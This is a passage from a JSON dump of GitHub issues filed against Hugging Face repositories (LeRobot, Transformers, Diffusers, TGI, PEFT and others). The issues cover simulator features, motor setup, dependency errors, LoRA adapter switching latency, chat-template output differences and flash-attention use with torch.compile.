--eval.n_episodes=50 \nINFO 2025-07-01 05:33:14 pts/eval.py:467 {'env': {'episode_length': 400,\n 'features': {'action': {'shape': (14,),\n 'type': },\n 'agent_pos': {'shape': (14,),\n 'type': },\n 'pixels/top': {'shape': (480, 640, 3),\n 'type': }},\n 'features_map': {'action': 'action',\n 'agent_pos': 'observation.state',\n 'pixels/top': 'observation.images.top',\n 'top': 'observation.image.top'},\n 'fps': 50,\n 'obs_type': 'pixels_agent_pos',\n 'render_mode': 'rgb_array',\n 'task': 'AlohaInsertion-v0'},\n 'eval': {'batch_size': 10, 'n_episodes': 50, 'use_async_envs': False},\n 'job_name': 'aloha_act',\n 'output_dir': PosixPath('outputs/eval/2025-07-01/05-33-14_aloha_act'),\n 'policy': {'chunk_size': 100,\n 'device': 'cuda',\n 'dim_feedforward': 3200,\n 'dim_model': 512,\n 'dropout': 0.1,\n 'feedforward_activation': 'relu',\n 'input_features': {'observation.images.top': {'shape': (3,\n 480,\n 640),\n 'type': },\n 'observation.state': {'shape': (14,),\n 'type': }},\n 'kl_weight': 10.0,\n 'latent_dim': 32,\n 'license': None,\n 'n_action_steps': 100,\n 'n_decoder_layers': 1,\n 'n_encoder_layers': 4,\n 'n_heads': 8,\n 'n_obs_steps': 1,\n 'n_vae_encoder_layers': 4,\n 'normalization_mapping': {'ACTION': ,\n 'STATE': ,\n 'VISUAL': },\n 'optimizer_lr': 1e-05,\n 'optimizer_lr_backbone': 1e-05,\n 'optimizer_weight_decay': 0.0001,\n 'output_features': {'action': {'shape': (14,),\n 'type': }},\n 'pre_norm': False,\n 'pretrained_backbone_weights': 'ResNet18_Weights.IMAGENET1K_V1',\n 'private': None,\n 'push_to_hub': False,\n 'replace_final_stride_with_dilation': 0,\n 'repo_id': None,\n 'tags': None,\n 'temporal_ensemble_coeff': None,\n 'use_amp': False,\n 'use_vae': True,\n 'vision_backbone': 'resnet18'},\n 'seed': 1000}\nINFO 2025-07-01 05:33:14 pts/eval.py:476 Output dir: outputs/eval/2025-07-01/05-33-14_aloha_act\nINFO 2025-07-01 05:33:14 pts/eval.py:478 Making environment.\nINFO 2025-07-01 05:33:14 /__init__.py:84 MUJOCO_GL=%s, attempting to import specified O", "url": "https://github.com/huggingface/lerobot/issues/1424", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-01T12:16:38Z", "updated_at": "2025-08-12T09:49:05Z", "user": "raul-machine-learning" }, { "repo": "huggingface/lerobot", "number": 1421, "title": "It would help to have a description for the lerobots datasets:", "body": "for example, for [lerobot/aloha_sim_insertion_human](https://huggingface.co/datasets/lerobot/aloha_sim_insertion_human) comes with no description at all\n\n\nI'd help to know\n- What makes this data special/interesting\n- How to train different models in the simulator\n- What should we expect\n- what does the `_human` means, and how is it different from the `_script` suffix", "url": "https://github.com/huggingface/lerobot/issues/1421", "state": "open", "labels": [ "question", "dataset" ], "created_at": "2025-07-01T10:14:45Z", "updated_at": "2025-08-12T09:49:27Z", "user": "raul-machine-learning" }, { "repo": "huggingface/lerobot", "number": 1419, "title": "simulator should allow pushing objects around with the mouse interactively", "body": "Not having this is preventing us from testing, debugging and playing with the robots.\n\nAccording to Mujoco documentation this feature available in their simulator but it is not exposed in lerobot:\n\n```\nA related usability feature is the ability to \u201creach into\u201d the simulation, push objects around and see how the \nphysics respond. The user selects the body to which the external forces and torques will be applied, and sees \na real-time rendering of the perturbations together with their dynamic consequences. This can be used to debug \nthe model visually, to test the response of a feedback controller, or to configure the model into a desired pose.\n```\n\nAlso for an awesome OOTB experience it would be great to have a script that loads a pretrained model and makes the interactive simulation just work.\n", "url": "https://github.com/huggingface/lerobot/issues/1419", "state": "open", "labels": [ "question", "simulation" ], "created_at": "2025-07-01T09:47:02Z", "updated_at": "2025-08-12T09:50:18Z", "user": "raul-machine-learning" }, { "repo": "huggingface/lerobot", "number": 1418, "title": "Robot tries to transfer cube even if it failed to pick it up, shouldn't it retry?", "body": "I am evaluating the following policy:\n```\npython lerobot/scripts/eval.py --policy.path=lerobot/act_aloha_sim_transfer_cube_human --env.type=aloha --env.task=AlohaTransferCube-v0 --eval.n_episodes=1 --eval.batch_size=1\n```\n\nHowever the robot fails to pick up the cube but carries on with the task, shouldn't the robot keep on trying until it picks up the cube? See the video\n\nhttps://github.com/user-attachments/assets/5ad20353-97bc-4d03-a78d-5f9f149c95f9\n", "url": "https://github.com/huggingface/lerobot/issues/1418", "state": "closed", "labels": [ "question", "simulation" ], "created_at": "2025-07-01T09:18:38Z", "updated_at": "2025-10-17T11:57:34Z", "user": "raul-machine-learning" }, { "repo": "huggingface/transformers", "number": 39137, "title": "ImportError: cannot import name 'pipeline' from 'transformers'", "body": "### System Info\n\nI am using Databricks notebook. \nDatabricks runtime: 13.3 LTS (includes Apache Spark 3.4.1, Scala 2.12)\n\n### Who can help?\n\n@Rocketknight1 @SunMarc @zach-huggingface\n\n### Information\n\n- [x] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [x] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nHere is the code:\n\n```\n%pip install --upgrade torch transformers accelerate deepspeed bitsandbytes huggingface_hub\ndbutils.library.restartPython()\n\nimport os\nimport torch\nfrom transformers import AutoTokenizer, AutoModelForCausalLM, pipeline\n```\n\nError:\n`ImportError: cannot import name 'pipeline' from 'transformers' (/local_disk0/.ephemeral_nfs/envs/pythonEnv-a13cd5c4-d035-4d04-87bd-75088348617d/lib/python3.10/site-packages/transformers/__init__.py)`\n\nPython: 3.10.12\ninstalled packages:\ntransformers== 4.53.0\nhuggingface_hub==0.33.1\ntorch==2.7.1+cu126\naccelerate==1.8.1\ndeepspeed==0.17.1\nbitsandbytes==0.46.0\n\nThese are all up-to-date versions for all of these packages. What is the problem?\n\n### Expected behavior\n\nImport without error.", "url": "https://github.com/huggingface/transformers/issues/39137", "state": "closed", "labels": [ "Usage", "bug" ], "created_at": "2025-06-30T18:49:54Z", "updated_at": "2025-10-23T00:53:19Z", "comments": 14, "user": "atabari-bci" }, { "repo": "huggingface/lerobot", "number": 1407, "title": "Can read the current signals from the lerobot?", "body": "Can a user read the current signals from the LeRobot?", "url": "https://github.com/huggingface/lerobot/issues/1407", "state": "open", "labels": [ "question", "sensors" ], "created_at": "2025-06-30T10:05:26Z", "updated_at": "2025-08-12T09:51:06Z", "user": "Frank-ZY-Dou" }, { "repo": "huggingface/optimum", "number": 2314, "title": "How to set the dynamic input sizes for decoder_with_past_model.onnx of NLLB", "body": "Dear author,\nI'm a beginner in optimum. So this question may be an elementary one. I used optimum to export decoder_with_past_model.onnx from nllb-200-distilled-600M. The resulted onnx has many inputs with dynamic shape. Now I intend to overwrite the inputs with static sizes. However, I'm not sure about the correct settings. \n\nThere are 4 arguments to be determined and I set:\nbatch_size = 1\nencoder_sequence_length = 200 (same with max_length)\npast_decoder_sequence_length = 200\nencoder_sequence_length_out = 200\n\nAny suggestions are appre\n\n![Image](https://github.com/user-attachments/assets/5f5da148-7e22-40f3-8d8c-6407884f469d)\n\nciated. Big thanks.", "url": "https://github.com/huggingface/optimum/issues/2314", "state": "closed", "labels": [ "Stale" ], "created_at": "2025-06-30T06:37:50Z", "updated_at": "2025-08-07T02:17:43Z", "user": "liamsun2019" }, { "repo": "huggingface/transformers", "number": 39114, "title": "Is there a way to force it to use ASCII based progress bar and not the ipython widget one?", "body": "When loading models, I like it better to have a ASCII based progress bar and not a IPython one", "url": "https://github.com/huggingface/transformers/issues/39114", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-06-29T22:41:19Z", "updated_at": "2025-07-07T13:20:13Z", "comments": 0, "user": "weathon" }, { "repo": "huggingface/transformers", "number": 39105, "title": "How to use other acceleration apis of npu?", "body": "### Feature request\n\nI noticed that transformers now support using flash attention directly in the npu by [```npu_flash_attention.py```](https://github.com/huggingface/transformers/pull/36696). There are many other acceleration apis that can be used in npu, such as shown in [doc](https://www.hiascend.com/document/detail/zh/Pytorch/700/ptmoddevg/trainingmigrguide/performance_tuning_0028.html).\n\n How can we use them directly in transformers? How to switch seamlessly between different devices?\n\n### Motivation\n\nRequest to integrate other acceleration apis of npu in transformers. If this can be done, the ease of using transformers will be greatly improved in npu.", "url": "https://github.com/huggingface/transformers/issues/39105", "state": "closed", "labels": [ "Feature request" ], "created_at": "2025-06-29T08:26:29Z", "updated_at": "2026-01-04T07:23:26Z", "user": "zheliuyu" }, { "repo": "huggingface/candle", "number": 3013, "title": "Word Timestamp for whisper", "body": "Hi is there no way to get word timestamp using the whisper in candle?\n\nThe example successfully demonstrates the retrieval of segment timestamp but how would one retrieve word timestamp.\n\nWhen I look into python code, they seem to pass this `word_timestamp=True` argument while transcribing and get the result with `base` model.\n\nIs there any work around or can someone point me towards how to achieve this please.", "url": "https://github.com/huggingface/candle/issues/3013", "state": "open", "labels": [], "created_at": "2025-06-29T01:16:38Z", "updated_at": "2025-06-29T23:47:39Z", "comments": 2, "user": "bp7968h" }, { "repo": "huggingface/trl", "number": 3662, "title": "What is the point of steps_per_gen in GRPO Trainer", "body": "Hello, can you please explain what is the point of steps_per_gen in GRPO Training config when we already have num_iterations? The policy update logic can then simply be:\n\nif num_iterations = 1, generations and model update are on_policy (per_token_logps = old_per_token_logps)\n\nWhen num_iterations > 1, then the same generation will be used for multiple times, and per_token_logps will be different from old_per_token_logps for all but the first time a generation batch is used. \n\nWhy is steps_per_gen needed? It just makes the overall batch generation and splitting logic unnecessarily difficult to understand.. ", "url": "https://github.com/huggingface/trl/issues/3662", "state": "open", "labels": [ "\u2753 question", "\ud83c\udfcb GRPO" ], "created_at": "2025-06-28T20:08:01Z", "updated_at": "2025-07-25T08:05:50Z", "user": "ankur6ue" }, { "repo": "huggingface/lerobot", "number": 1399, "title": "calibrate.py for only follower", "body": "the calibrate.py file doesnt work for setting up the motors for the follower arm, as there arent enough parameters for the function to run. Has anyone made an adaption for the calibrate file that doesnt take into consideration the teleop?", "url": "https://github.com/huggingface/lerobot/issues/1399", "state": "open", "labels": [ "question", "teleoperators" ], "created_at": "2025-06-27T20:53:47Z", "updated_at": "2025-08-12T09:51:53Z", "user": "ramallis" }, { "repo": "huggingface/transformers", "number": 39091, "title": "`transformers`' dependency on `sentencepiece` blocks use on windows in python 3.13", "body": "### System Info\n\nDue to \n* changes in Python 3.13,\n* an incompatibility in `sentencepiece`,\n* `transformers` dependency on `sentencepiece`,\n\n`transformers` cannot be easily installed under windows + py3.13, and does not work as a dependency of other packages in this environment\n\nThere are multiple issues and a merged PR on sentencepiece (https://github.com/google/sentencepiece/pull/1084) from Feb 26 2025 but no release has been forthcoming\n\n\n\n### Who can help?\n\n* people currently using `sentencepiece` in `transformers` code they own\n* people determining what the scope of `transformers`' OS & python support is\n* `sentencepiece` pypi maintainers\n\n\n### Reproduction\n\n1. Be on windows\n2. Be on python 3.13\n3. Try to install current `transformers` from pypi\n4. If you get this far, use any function importing `sentencepiece`, e.g. loading an `xlm_roberta` model\n\n### Expected behavior\n\nCode doesn't raise exception", "url": "https://github.com/huggingface/transformers/issues/39091", "state": "closed", "labels": [ "Usage" ], "created_at": "2025-06-27T15:23:57Z", "updated_at": "2025-07-03T16:02:47Z", "comments": 5, "user": "leondz" }, { "repo": "huggingface/transformers", "number": 39073, "title": "Inefficient default GELU implementation in GPT2", "body": "While profiling the HuggingFace GPT2 model, I found that the default GELU backend used is NewGELUActivation, which is inefficient in most cases. Instead of using a fused CUDA kernel, NewGELUActivation executes multiple separate PyTorch-level operators, leading to unnecessary kernel launches and memory overhead.\n\n```python\n# activations.py:L46\nclass NewGELUActivation(nn.Module):\n def forward(self, input: Tensor) -> Tensor:\n return 0.5 * input * (1.0 + torch.tanh(math.sqrt(2.0 / math.pi) * (input + 0.044715 * torch.pow(input, 3.0))))\n```\n\nIs there a reason why NewGELUActivation is still used as the default for GPT2, rather than switching to nn.functional.gelu or another fused alternative?\n\nI\u2019d be happy to share profiler traces or help test a patch if helpful.", "url": "https://github.com/huggingface/transformers/issues/39073", "state": "closed", "labels": [], "created_at": "2025-06-27T09:07:39Z", "updated_at": "2025-08-12T03:35:13Z", "comments": 4, "user": "null-pointer-access" }, { "repo": "huggingface/diffusers", "number": 11816, "title": "set_adapters performance degrades with the number of inactive adapters", "body": "### Describe the bug\n\n### Goal\nBuild an image-generation service with `StableDiffusionXLPipeline` that:\n\n1. Keeps ~50 LoRA adapters resident in GPU VRAM.\n2. For each request:\n \u2022 activate **\u2264 5** specific LoRAs via `pipeline.set_adapters(...)` \n \u2022 run inference \n \u2022 deactivate them (ready for the next request).\n\n### Issue\n`pipeline.set_adapters()` becomes progressively slower the more unique LoRAs have ever been loaded,\neven though each call still enables only up to five adapters.\n\n| # LoRAs ever loaded | `set_adapters()` time (s) | \n|---------------------|---------------------------|\n| 3 | ~ 0.1031 | \n| 6 | ~ 0.1843 | \n| 9 | ~ 0.2614 |\n| 12 | ~ 0.3522 | \n| 45 | ~ 1.2470 | \n| 57 | ~ 1.5435 |\n\n### What I\u2019ve tried\n1. **Load LoRAs from disk for every request** ~ 0.8 s/LoRA, too slow. \n2. **Keep LoRAs in RAM (`SpooledTemporaryFile`) + `pipeline.delete_adapter()`** \u2013 roughly as slow as (1). \n3. **Keep all 50 LoRAs on the GPU** and just switch with `set_adapters()` \u2013 fastest so far, but still shows the O(N)-style growth above.\n\n### Question\nIs this increasing latency expected? \nIs there a recommended pattern for caching many LoRAs on the GPU and switching between small subsets without paying an O(total LoRAs) cost every time?\n\nAny guidance (or confirmation it\u2019s a current limitation) would be greatly appreciated!\n\n### Reproduction\n\n
\nCode\n\n``` Minimal example\nimport os\nimport time\nfrom typing import List\nfrom pydantic import BaseModel\nfrom diffusers import StableDiffusionXLPipeline, AutoencoderTiny\nimport torch\nfrom diffusers.utils import logging\nlogging.disable_progress_bar()\nlogging.set_verbosity_error() \n\npipeline = None\n\nclass Lora(BaseModel):\n name: str\n strength: float\n\ndef timeit(func):\n def wrapper(*args, **kwargs):\n start = time.time()\n result = func(*args, **kwargs)\n end = time.time()\n duration = end - start\n print(f\"{func.__name__} executed in {duration:.4f} seconds\")\n return result\n return wrapper\n\n@timeit\ndef load_model():\n pipeline = StableDiffusionXLPipeline.from_pretrained(\n \"stabilityai/stable-diffusion-xl-base-1.0\",\n torch_dtype=torch.float16,\n vae=AutoencoderTiny.from_pretrained(\n 'madebyollin/taesdxl',\n use_safetensors=True,\n torch_dtype=torch.float16,\n )\n ).to(\"cuda\")\n pipeline.set_progress_bar_config(disable=True)\n\n return pipeline\n\n@timeit\ndef set_adapters(pipeline, adapter_names, adapter_weights):\n pipeline.set_adapters(\n adapter_names=adapter_names,\n adapter_weights=adapter_weights,\n )\n\n@timeit\ndef fuse_lora(pipeline):\n pipeline.fuse_lora()\n\n@timeit\ndef inference(pipeline, req, generator=None):\n return pipeline(\n prompt=req.prompt,\n negative_prompt=req.negative_prompt,\n width=req.width,\n height=req.height,\n num_inference_steps=req.steps,\n guidance_scale=req.guidance_scale,\n generator=generator,\n ).images\n\ndef apply_loras(pipeline, loras: list[Lora]) -> str:\n if not loras or len(loras) == 0:\n pipeline.disable_lora()\n return\n \n pipeline.enable_lora()\n for lora in loras:\n try:\n pipeline.load_lora_weights(\n \"ostris/super-cereal-sdxl-lora\",\n weight_name=\"cereal_box_sdxl_v1.safetensors\",\n adapter_name=lora.name,\n token=os.getenv(\"HUGGINGFACE_HUB_TOKEN\", None),\n )\n except ValueError:\n continue # LoRA already loaded, skip\n except Exception as e:\n print(f\"Failed to load LoRA {lora}: {e}\")\n continue\n set_adapters(\n pipeline,\n adapter_names=[lora.name for lora in loras],\n adapter_weights=[lora.strength for lora in loras],\n )\n fuse_lora(pipeline)\n \n\n return\n\ndef generate_images(req, pipeline):\n generator = torch.Generator(device=\"cuda\").manual_seed(42)\n\n apply_loras(pipeline, req.loras)\n\n images = inference(\n pipeline,\n req,\n generator=generator,\n )\n\n pipeline.unfuse_lora()\n \n return images\n\nclass GenerationRequest(BaseModel):\n prompt: str\n loras: List[Lora] = []\n negative_prompt: str = \"\"\n width: int = 512\n height: int = 512\n steps: int = 30\n guidance_scale: float = 7\n\ndef test_lora_group(pipeline, lora_group: List[Lora], group_number: int): \n test_req = GenerationRequest(\n prompt=\"a simple test image\",\n loras=[Lora(name=lora_name, strength=0.8) for lora_name in lora_group],\n width=256,\n height=256,\n steps=10,\n )\n \n try:\n generate_images(test_req, pipeline)\n return True, lora_group\n except Exception as e:\n return Fa", "url": "https://github.com/huggingface/diffusers/issues/11816", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-26T22:27:54Z", "updated_at": "2025-09-29T14:33:13Z", "comments": 27, "user": "hrazjan" }, { "repo": "huggingface/lerobot", "number": 1393, "title": "motor configuration request - one motor at a time like configure_motors", "body": "I like the new process generally but I think the ability to configure a single motor was valuable (e.g., re-configure a single problematic configuration rather than having to go through the full configuration).\n\nIn addition to the current process, it would be nice if we could bring that per-motor functionality forward, maybe the ability to pass a single motor ID in `lerobot.setup_motor`? \n\nref: https://huggingface.co/docs/lerobot/en/so101#2-set-the-motors-ids-and-baudrates\n", "url": "https://github.com/huggingface/lerobot/issues/1393", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-06-26T19:27:36Z", "updated_at": "2025-08-12T09:52:30Z", "user": "brainwavecoder9" }, { "repo": "huggingface/text-generation-inference", "number": 3277, "title": "Rubbish responses by Llama-3.3-70B-Instruct when message API is enabled.", "body": "### System Info\n\nTGI endpoint deployed on AWS SageMaker using the 3.2.3 image version. \nThe image URI is `763104351884.dkr.ecr.us-east-1.amazonaws.com/huggingface-pytorch-tgi-inference:2.6.0-tgi3.2.3-gpu-py311-cu124-ubuntu22.04`\nThe environment is:\n```python\nenv = {'HF_MODEL_ID': 'meta-llama/Llama-3.3-70B-Instruct', \n 'HF_TASK': 'text-generation', \n 'SM_NUM_GPUS': '8', \n 'MAX_INPUT_LENGTH': '2048', \n 'MAX_TOTAL_TOKENS': '4096', \n 'MAX_BATCH_PREFILL_TOKENS': '4096', \n 'HUGGING_FACE_HUB_TOKEN': None, \n 'MESSAGES_API_ENABLED': 'true', \n 'ENABLE_PREFILL_LOGPROBS': 'false'\n}\nNote the **MESSAGES_API_ENABLED** above.\n\n```\nDeployed using the AWS Python SDK:\n```python\nfrom sagemaker.huggingface.model import HuggingFaceModel\n\nHuggingFaceModel(\n env=env,\n image_uri=image_uri,\n name=params.endpoint_name,\n role=get_my_sagemaker_execution_role(),\n )\n```\n\nDeployed on a ml.g5.48xlarge machine.\n\n### Information\n\n- [ ] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\nUsing the SageMaker Python SDK, when invoking using a manually rendered chat template, I get the following response:\n```python\nfrom transformers import AutoTokenizer\nfrom sagemaker.huggingface.model import HuggingFacePredictor\n\n# define messages\nmessage_dict = [{'role': 'user', 'content': 'Who is the president of the United States?'},\n {'role': 'assistant',\n 'content': 'The current president of the United States is Donald Trump.'},\n {'role': 'user',\n 'content': (\n \"Your task is to rewrite the given question in a context independent manner.\\n\"\n \"Here are some examples:\\n\\n\"\n \"Example 1:\\n\"\n \"Q: What is the capital of France?\\n\"\n \"A: Paris?\\n\"\n \"Q: How many people live there?\\n\"\n \"Rewrite: How many people live in Paris?\\n\\n\"\n \"Example 2:\\n\"\n \"Q: Do I need a visa to travel to the United States?\\n\"\n \"A: Yes, you need a visa to travel to the United States.\\n\"\n \"Q: What is the process to get a visa?\\n\"\n \"Rewrite: What is the process to get a visa for the United States?\\n\\n\"\n \"Now it's your turn:\\n\"\n \"Q: Who is the president of the United States?\\n\"\n \"A: The current president of the United States is Donald Trump.\\n\"\n \"Q: When was he elected?\\n\"\n )},\n {'role': 'assistant', 'content': 'Rewrite: '}]\n\n# construct predictor\npred = HuggingFacePredictor(endpoint_name=my_endpoint_name, sagemaker_session=get_my_sagemaker_session())\n\n# render the messages to a string\ntok = AutoTokenizer.from_pretrained(setup_params.llm_name)\nrendered_messages = tok.apply_chat_template(prompt.messages.model_dump(), tokenize=False, \n\n# invoke the predictor\nadd_generation_prompt=False, continue_final_message=True)\nresp = pred.predict({\"inputs\": rendered_messages})\n``` \nThe response is\n```python\n[{'generated_text': \"<|begin_of_text|><|start_header_id|>system<|end_header_id|>\\n\\nCutting Knowledge Date: December 2023\\nToday Date: 26 Jul 2024\\n\\n<|eot_id|><|start_header_id|>user<|end_header_id|>\\n\\nWho is the president of the United States?<|eot_id|><|start_header_id|>assistant<|end_header_id|>\\n\\nThe current president of the United States is Donald Trump.<|eot_id|><|start_header_id|>user<|end_header_id|>\\n\\nYour task is to rewrite the given question in a context independent manner.\\nHere are some examples:\\n\\nExample 1:\\nQ: What is the capital of France?\\nA: Paris?\\nQ: How many people live there?\\nRewrite: How many people live in Paris?\\n\\nExample 2:\\nQ: Do I need a visa to travel to the United States?\\nA: Yes, you need a visa to travel to the United States.\\nQ: What is the process to get a visa?\\nRewrite: What is the process to get a visa for the United States?\\n\\nNow it's your turn:\\nQ: Who is the president of the United States?\\nA: The current president of the United States is Donald Trump.\\nQ: When was he elected?<|eot_id|><|start_header_id|>assistant<|end_header_id|>\\n\\nRewrite: When was Donald Trump elected?\"}]\n```\nNote, that the suffix after the \"Rewrite: \" is reasonable - it's the re-written query to be context independent.\n\nWhen using message-api directly, I get something radically different:\n```python\npred.predict({\"messages\": message_dict})\n```\nthe output is:\n```\n{'object': 'chat.completion',\n 'id': '',\n 'created': 1750919575,\n 'model': 'meta-llama/Llama-3.3-70B-Instruct',\n 'system_fingerprint': '3.2.3-sha-a1f3ebe',\n 'choices': [{'index': 0,\n 'message': {'role': 'assistant',\n 'content': ' What is the process to get a visa to travel to the United States?\\n\\nHere is the given question: \\nWho is the president of the United States?\\n\\nSo the response to the question would be: \\nThe current president of the United States is Joe Biden.\\n\\nQ: How long has he been in office?\\nRewrite: How long has Joe Biden been in office?'},\n 'logprobs': None,\n 'finish_reason': 'stop'}],\n 'usage': ", "url": "https://github.com/huggingface/text-generation-inference/issues/3277", "state": "open", "labels": [], "created_at": "2025-06-26T06:49:31Z", "updated_at": "2025-06-26T06:56:22Z", "comments": 0, "user": "alexshtf" }, { "repo": "huggingface/peft", "number": 2615, "title": "How can I fine-tune the linear layers of the LLM part in Qwen2.5_VL 3B?", "body": "I only want to fine-tune the linear layers in the LLM part of Qwen2.5_VL 3B. The LoRA target modules are as follows:\n```\ntarget_modules: List[str] = field(default_factory=lambda: [ \n 'self_attn.q_proj',\n 'self_attn.k_proj',\n 'self_attn.v_proj',\n 'self_attn.o_proj',\n 'mlp.gate_proj',\n 'mlp.up_proj',\n 'mlp.down_proj',\n])\n```\nHowever, there's an issue: the vision encoder part of Qwen2.5_VL 3B also contains modules named `mlp.gate_proj`, `mlp.up_proj`, and `mlp.down_proj`, as shown here:\n\n```\n\"visual.blocks.0.mlp.down_proj.bias\": \"model-00001-of-00002.safetensors\",\n\"visual.blocks.0.mlp.down_proj.weight\": \"model-00001-of-00002.safetensors\",\n\"visual.blocks.0.mlp.gate_proj.bias\": \"model-00001-of-00002.safetensors\",\n\"visual.blocks.0.mlp.gate_proj.weight\": \"model-00001-of-00002.safetensors\",\n\"visual.blocks.0.mlp.up_proj.bias\": \"model-00001-of-00002.safetensors\",\n\"visual.blocks.0.mlp.up_proj.weight\": \"model-00001-of-00002.safetensors\",\n```\nThis causes the `mlp.gate_proj`, `mlp.up_proj`, and `mlp.down_proj` in the vision encoder to also be involved in the fine-tuning. \n\nFor example, the 31st block is as follows:\n```\nvisual.blocks.31.mlp.gate_proj.lora_A.default.weight\nvisual.blocks.31.mlp.gate_proj.lora_B.default.weight\nvisual.blocks.31.mlp.up_proj.lora_A.default.weight\nvisual.blocks.31.mlp.up_proj.lora_B.default.weight\nvisual.blocks.31.mlp.down_proj.lora_A.default.weight\nvisual.blocks.31.mlp.down_proj.lora_B.default.weight\n```\n\nFinally, I only want to fine-tune the linear layers in the LLM part of Qwen2.5_VL 3B, How can I resolve this? Thank you!\n\n\n", "url": "https://github.com/huggingface/peft/issues/2615", "state": "closed", "labels": [], "created_at": "2025-06-26T02:08:43Z", "updated_at": "2025-07-18T16:04:27Z", "comments": 7, "user": "guoguo1314" }, { "repo": "huggingface/lerobot", "number": 1383, "title": "Can multiple Lerobot datasets be mixed to pre-train a VLA model?", "body": "Hello, I would like to know if multiple independent Lerobot datasets can be mixed to achieve large-scale pre-training of a VLA model. Just like OpenVLA, it can mix multiple RLDS datasets to pre-train models.", "url": "https://github.com/huggingface/lerobot/issues/1383", "state": "open", "labels": [ "enhancement", "question", "dataset" ], "created_at": "2025-06-25T08:45:48Z", "updated_at": "2025-08-12T09:55:48Z", "user": "xliu0105" }, { "repo": "huggingface/transformers", "number": 39023, "title": "Does Gemma 3 need positions ids to be 1-indexed explicitly?", "body": "Hi Team\n\nAt some point `Gemma3ForConditionalGeneration` used to impose a 1-indexing of `position_ids`, [see here](https://github.com/huggingface/transformers/blob/cf8091c017533c03be73b84ab535ae9c80924796/src/transformers/models/gemma3/modeling_gemma3.py#L1430). However you won't find this in the latest main anymore, [see here](https://github.com/huggingface/transformers/blob/cf8091c017533c03be73b84ab535ae9c80924796/src/transformers/models/gemma3/modeling_gemma3.py#L1430), I know there is some overwriting of position ids taking place but I wanted to know if it's the same 1-index conversion.\n\nDoes Gemma3ForConditionalGeneration still need 1-indexed position ids and if so do I need to manually do that before passing custom position ids?", "url": "https://github.com/huggingface/transformers/issues/39023", "state": "closed", "labels": [], "created_at": "2025-06-25T00:00:14Z", "updated_at": "2025-07-25T17:27:26Z", "comments": 2, "user": "krypticmouse" }, { "repo": "huggingface/transformers", "number": 39017, "title": "Not able to use flash attention with torch.compile with model like BERT", "body": "### System Info\n\nwhen using torch.compile with model like BERT, the attention mask gets set to non-null value in the following function in `src/transformers/modeling_attn_mask_utils.py`. Flash attention does not support non-null attention mask ([source](https://github.com/pytorch/pytorch/blob/b09bd414a6ccba158c09f586a278051588d90936/aten/src/ATen/native/transformers/sdp_utils_cpp.h#L261)).\n\n\n```python\ndef _prepare_4d_attention_mask_for_sdpa(mask: torch.Tensor, dtype: torch.dtype, tgt_len: Optional[int] = None):\n \"\"\"\n Creates a non-causal 4D mask of shape `(batch_size, 1, query_length, key_value_length)` from a 2D mask of shape\n `(batch_size, key_value_length)`\n\n Args:\n mask (`torch.Tensor`):\n A 2D attention mask of shape `(batch_size, key_value_length)`\n dtype (`torch.dtype`):\n The torch dtype the created mask shall have.\n tgt_len (`int`):\n The target length or query length the created mask shall have.\n \"\"\"\n _, key_value_length = mask.shape\n tgt_len = tgt_len if tgt_len is not None else key_value_length\n\n is_tracing = torch.jit.is_tracing() or isinstance(mask, torch.fx.Proxy) or is_torchdynamo_compiling()\n\n # torch.jit.trace, symbolic_trace and torchdynamo with fullgraph=True are unable to capture data-dependent controlflows.\n if not is_tracing and torch.all(mask == 1):\n return None\n else:\n return AttentionMaskConverter._expand_mask(mask=mask, dtype=dtype, tgt_len=tgt_len)\n```\n\nis there a proper way to bypass this for bert when using torch.compile (fullgraph=False)?\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nscript to repro:\n\n```python\nimport torch, transformers, torch.profiler as tp\n\ncfg = transformers.BertConfig.from_pretrained(\n \"bert-base-uncased\",\n attn_implementation=\"sdpa\", # opt-in to HF's SDPA path\n output_attentions=False,\n attention_probs_dropout_prob=0.0 # turn off dropout (Flash limit)\n)\nm = transformers.BertModel(cfg).eval().to(\"cuda\", torch.float16)\n\ntok = transformers.BertTokenizer.from_pretrained(\"bert-base-uncased\")\ninputs = tok(\"hello world\", return_tensors=\"pt\").to(\"cuda\")\n# keep the all-ones mask that the tokenizer created\n\ncompiled = torch.compile(m, fullgraph=False) # fullgraph=True behaves the same\n\nwith tp.profile(\n activities=[tp.ProfilerActivity.CUDA], # <- keyword!\n record_shapes=False # any other kwargs you need\n) as prof:\n compiled(**inputs)\n\nprint(\"Flash kernel present?\",\n any(\"flash_attention\" in k.name for k in prof.key_averages()))\n```\n\n### Expected behavior\n\nI was expecting it to print the following, indicating its using flash attention kernels.\n\n`Flash kernel present? True`", "url": "https://github.com/huggingface/transformers/issues/39017", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-24T19:09:07Z", "updated_at": "2025-10-09T23:03:45Z", "comments": 3, "user": "gambiTarun" }, { "repo": "huggingface/lerobot", "number": 1379, "title": "New motor configuration doesn't center servo motors for so100", "body": "I was used to using the previously existing `configure_motor.py` script to set the baudrate, ID and center the servo. And I used to do this before attempting assembly.\n\nThis script was also useful for configuring individual motors whenever I had to replace one in case they brok for some reason.\n\nI just pulled the latest version of lerobot and found that script is gone and replaced by one that expects me to configure every motor sequentially, which is annoying.\n\nFurthermore it doesn't center the servo anymore, instead it just sets the homing offset. This makes it possible for someone to have the motor at one of the limits, assemble the robot that way and not actually be able to move it (or have its motion limited). Essentially this new setup seems more prone to user error, especially because it doesn't mention any of these issues in the assembly process.\n\nAlso older users are now not able to center the servo with any script.", "url": "https://github.com/huggingface/lerobot/issues/1379", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-06-24T15:43:16Z", "updated_at": "2025-08-12T09:56:02Z", "user": "Esser50K" }, { "repo": "huggingface/datasets", "number": 7637, "title": "Introduce subset_name as an alias of config_name", "body": "### Feature request\n\nAdd support for `subset_name` as an alias for `config_name` in the datasets library and related tools (such as loading scripts, documentation, and metadata).\n\n### 